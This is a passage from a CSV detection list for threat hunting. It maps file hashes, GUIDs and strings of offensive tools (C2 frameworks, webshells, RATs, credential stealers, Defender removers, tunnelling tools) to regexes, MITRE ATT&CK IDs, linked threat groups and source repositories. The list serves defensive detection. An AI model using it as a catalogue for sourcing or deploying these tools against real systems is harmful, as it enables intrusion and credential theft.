"*c8f3081d43f87186ea9413304d6f0edc75c4d78682a3b844f7754dbf40b4a548*",".{0,1000}c8f3081d43f87186ea9413304d6f0edc75c4d78682a3b844f7754dbf40b4a548.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","37327"
"*c901499b26440e566a67a3a7f37c07fea83682c22be9bbd442de7d8590a3bb45*",".{0,1000}c901499b26440e566a67a3a7f37c07fea83682c22be9bbd442de7d8590a3bb45.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37328"
"*c90614a48df0d4005091daffbab57bbe716313999b39b27dfc1038748280b68f*",".{0,1000}c90614a48df0d4005091daffbab57bbe716313999b39b27dfc1038748280b68f.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","37329"
"*c909fbdc6b6254554995cef9878eb4982edaa05f545236ad78c1eb34f68020fc*",".{0,1000}c909fbdc6b6254554995cef9878eb4982edaa05f545236ad78c1eb34f68020fc.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37330"
"*c9152451df19ff8cac70faf169055ea18b3b91eb105d722873b27da26af7b599*",".{0,1000}c9152451df19ff8cac70faf169055ea18b3b91eb105d722873b27da26af7b599.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","37332"
"*C91C8B29-82DF-49C0-986B-81182CF84E42*",".{0,1000}C91C8B29\-82DF\-49C0\-986B\-81182CF84E42.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","37335"
"*c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862*",".{0,1000}c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37337"
"*c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126*",".{0,1000}c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37338"
"*c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb*",".{0,1000}c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37339"
"*c92580318be4effdb37aa67145748826f6a9e285bc2426410dc280e61e3c7620*",".{0,1000}c92580318be4effdb37aa67145748826f6a9e285bc2426410dc280e61e3c7620.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37340"
"*c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8*",".{0,1000}c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37341"
"*c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8*",".{0,1000}c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37342"
"*c93370cc4ea9cd3e11dd4c24884e8d91a3c062e739ca5a33eabf8ed19a15b92f*",".{0,1000}c93370cc4ea9cd3e11dd4c24884e8d91a3c062e739ca5a33eabf8ed19a15b92f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","37343"
"*c933e37b3b281f081e395a20bb950a1a5130f839bf3477f0bf6fc62c1535591b*",".{0,1000}c933e37b3b281f081e395a20bb950a1a5130f839bf3477f0bf6fc62c1535591b.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","37346"
"*c93f1ff5eaa4bf916a60985cefe63fbb630234d620567da3561c41f652a469ed*",".{0,1000}c93f1ff5eaa4bf916a60985cefe63fbb630234d620567da3561c41f652a469ed.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37348"
"*c93ff0ad29732505e9679eed6561ceef907bcb1f5df9b6a588c23e484df85681*",".{0,1000}c93ff0ad29732505e9679eed6561ceef907bcb1f5df9b6a588c23e484df85681.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37349"
"*c942e9aa3e16c4cad9415815f8e3faea0056d3bef8f9eca6373d605c84542f23*",".{0,1000}c942e9aa3e16c4cad9415815f8e3faea0056d3bef8f9eca6373d605c84542f23.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37351"
"*c9436dd6ae789bd83bada6aa823ea7f3d1a36455e818d78f64ab296222dd3362*",".{0,1000}c9436dd6ae789bd83bada6aa823ea7f3d1a36455e818d78f64ab296222dd3362.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37352"
"*c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722*",".{0,1000}c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37353"
"*c9477106a63804fc0fc18aec7db98e372faac1cf192d976211b9867a22354c85*",".{0,1000}c9477106a63804fc0fc18aec7db98e372faac1cf192d976211b9867a22354c85.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37354"
"*c949913be70a42e2ea9395d2a2e7ac427cdc0d756b6b12d1e607ba3e11937e35*",".{0,1000}c949913be70a42e2ea9395d2a2e7ac427cdc0d756b6b12d1e607ba3e11937e35.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","37356"
"*c94e83dd256ed32fcb8b6cdbe709fe9951c133f8f1e19cd2ceb5b6dc075a114b*",".{0,1000}c94e83dd256ed32fcb8b6cdbe709fe9951c133f8f1e19cd2ceb5b6dc075a114b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37357"
"*c9574e5fa7bf17835ec454e507aa359f07fbc1903c8cb643e23e81a2614150e8*",".{0,1000}c9574e5fa7bf17835ec454e507aa359f07fbc1903c8cb643e23e81a2614150e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37358"
"*c9598fe89c9f4ca470ce47b556fea6289b05b1850c629c2c2f51f2efc995247c*",".{0,1000}c9598fe89c9f4ca470ce47b556fea6289b05b1850c629c2c2f51f2efc995247c.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37359"
"*c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56*",".{0,1000}c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","37363"
"*c973abdd59e75eda169065c64631477fa9ad6f01e3536d6f0754c27d0aeeec72*",".{0,1000}c973abdd59e75eda169065c64631477fa9ad6f01e3536d6f0754c27d0aeeec72.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","37364"
"*c97c3cf0f90fa6725324159635d3713685c751cba0ec854501c3fc979a349647*",".{0,1000}c97c3cf0f90fa6725324159635d3713685c751cba0ec854501c3fc979a349647.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37365"
"*c97df5d25ea1e9ed5b95606adc492cfb6d4fe97e2a538fcaef0ea66f1a239e64*",".{0,1000}c97df5d25ea1e9ed5b95606adc492cfb6d4fe97e2a538fcaef0ea66f1a239e64.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#filehash","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","37366"
"*c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0*",".{0,1000}c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37367"
"*c97e849bf283c760811373be29c588adc6ad820d7695a7552e87be693bea0ee6*",".{0,1000}c97e849bf283c760811373be29c588adc6ad820d7695a7552e87be693bea0ee6.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#filehash","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","37368"
"*c98676e955d513ce879f60ab157673e4d22c273b4f940c16258fa0bfd8729ffd*",".{0,1000}c98676e955d513ce879f60ab157673e4d22c273b4f940c16258fa0bfd8729ffd.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37369"
"*c995ae7e3e3ee04173a5ff56b676ed74057cbdc9fec4466a4402a42c1d56e060*",".{0,1000}c995ae7e3e3ee04173a5ff56b676ed74057cbdc9fec4466a4402a42c1d56e060.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37372"
"*c9978b0c3712e43f8e102dbff7ee57f7d59f38d5d17b0304bd691ba1c53a8893*",".{0,1000}c9978b0c3712e43f8e102dbff7ee57f7d59f38d5d17b0304bd691ba1c53a8893.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37373"
"*c99shell - Edited By KingDefacer*",".{0,1000}c99shell\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37374"
"*c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929*",".{0,1000}c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","37375"
"*c9a67da63c7f2a139df34098d0e74e225b67ed7acc93b18ff23601ce291ab00b*",".{0,1000}c9a67da63c7f2a139df34098d0e74e225b67ed7acc93b18ff23601ce291ab00b.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","37376"
"*C9AF8FE1-CDFC-4DDD-B314-B44AD5EAD552*",".{0,1000}C9AF8FE1\-CDFC\-4DDD\-B314\-B44AD5EAD552.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#GUIDproject","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","37378"
"*c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae*",".{0,1000}c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","37381"
"*c9c4b50a5eada9222d7c82caf9986fba3491dc9f55e8bdd0df2b8893936f4d98*",".{0,1000}c9c4b50a5eada9222d7c82caf9986fba3491dc9f55e8bdd0df2b8893936f4d98.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37383"
"*c9cb3638fbe1f4f28f08e4fad0394c4535de00e16854a2952936787d032c6c2f*",".{0,1000}c9cb3638fbe1f4f28f08e4fad0394c4535de00e16854a2952936787d032c6c2f.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","37385"
"*c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39*",".{0,1000}c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37387"
"*c9cfc822e5fe51fc15df971b147acf9cc5c572c026cacafbfab860006e39404a*",".{0,1000}c9cfc822e5fe51fc15df971b147acf9cc5c572c026cacafbfab860006e39404a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37388"
"*c9d16fdf0e5aa489bd8c6f0d930a8c25d9ad665583adb7780bc261b4df9c639c*",".{0,1000}c9d16fdf0e5aa489bd8c6f0d930a8c25d9ad665583adb7780bc261b4df9c639c.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","37389"
"*c9d40a5ec773680f943308b52b64ba1a4d37863570da23b5f4f7801012eff3f9*",".{0,1000}c9d40a5ec773680f943308b52b64ba1a4d37863570da23b5f4f7801012eff3f9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37390"
"*c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a*",".{0,1000}c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","37391"
"*c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2*",".{0,1000}c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37392"
"*c9dc3acf51b8cbfc14f4fd6f69bd3743d695c8e6013736a5b336ed6200c7036d*",".{0,1000}c9dc3acf51b8cbfc14f4fd6f69bd3743d695c8e6013736a5b336ed6200c7036d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37393"
